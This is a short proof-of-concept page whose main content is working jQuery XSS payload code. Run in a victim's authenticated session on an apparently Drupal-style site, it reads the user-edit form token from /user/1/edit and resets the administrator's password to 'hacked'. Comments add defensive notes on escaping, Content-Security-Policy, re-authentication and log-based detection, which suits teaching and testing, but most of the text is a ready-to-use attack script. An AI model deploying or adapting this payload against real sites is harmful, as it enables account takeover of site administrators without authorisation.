Update UID 1 password via JS

A simple proof of concept (without <script> tags) to reset the administrator's password via a cross-site scripting (XSS) attack. Did you think XSS was harmless?

  // XSS proof of concept: from inside an authenticated victim's page, reset the
  // password of user ID 1 by replaying the site's own user-edit form. The script
  // runs in the victim's origin, so both requests below are ordinary same-origin
  // requests that the browser sends with the victim's cookies.
  // Defensive takeaway: an anti-CSRF form token does not protect against XSS,
  // because script running in the page can read the token (see the regex below).
  // The mitigation is preventing the injection itself (contextual output
  // escaping of user-supplied content, a Content-Security-Policy) and requiring
  // the current password or re-authentication for credential changes, so that a
  // harvested form token alone is not enough.
  //
  // Test for the presence of jquery. The payload relies on the page already
  // having jQuery loaded; it does not load anything itself.
  if (typeof jQuery == 'function') {
    // Fetch a correct token from user/1/edit because we will need it to
    // successfully submit the user edit form later.
    // TODO: Include a check to increase the chance that the current user is admin,
    // which will reduce the number of access denied error messages in the log.
    // Detection note: those "access denied" entries for /user/1/edit, coming from
    // sessions that never otherwise touch that path, are exactly what a defender
    // should alert on.
    jQuery.get('/user/1/edit',
      function (data, status) {
        if (status == 'success') {
          // Extract the token. The regex only matches the token input as rendered
          // in the edit form; `matches` is null for any other response (e.g. an
          // access-denied page), and `matches[1]` then throws a TypeError that
          // ends the callback.
          var matches = data.match(/id="edit-user-edit-form-token" value="([a-z0-9]*)"/);
          var token = matches[1];
          // Post the minimum amount of fields. Other fields get their default values.
          // The new password is a hard-coded constant; the POST carries the freshly
          // read token, which is what satisfies the server's form-token check.
          var payload = {
            "form_id": 'user_edit',
            "form_token": token,
            "pass[pass1]": 'hacked',
            "pass[pass2]": 'hacked'
          };
          // Fire-and-forget: no callback, so success or failure is never checked.
          jQuery.post('/user/1/edit', payload);
        }
      }
    );
  }
